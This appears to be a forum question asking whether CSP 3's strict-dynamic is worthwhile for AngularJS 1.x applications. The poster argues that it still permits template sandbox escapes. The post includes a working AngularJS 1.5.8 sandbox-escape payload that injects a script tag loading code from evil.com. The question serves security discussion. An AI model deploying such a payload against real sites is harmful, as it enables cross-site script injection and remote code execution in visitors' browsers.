I do not see the point in using CSP 3's new strict-dynamic
in the case of an AngularJS 1.x application.
As far as I can tell, using strict-dynamic
still allows arbitrary Javascript injection via a sandbox escape in a template:
<html>
<head>
<title>Angular - Alert in Expression</title>
<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.5.8/angular.min.js"></script>
</head>
<body ng-app="" ng-csp>
<div>{{a=toString().constructor.prototype;a.charAt=a.trim;$eval('a,a=document.createElement("script"),a.src="https://evil.com/evil.js",a.type="text/javascript",a=document.getElementsByTagName("head")[0].appendChild(a),a')}}</div>
</body>
</html>
The worst thing is, the script injection above is allowed by strict-dynamic
, whereas a reasonable host-based CSP script-src
would block it.
So, is there any reason to use strict-dynamic
on an application that uses AngularJS?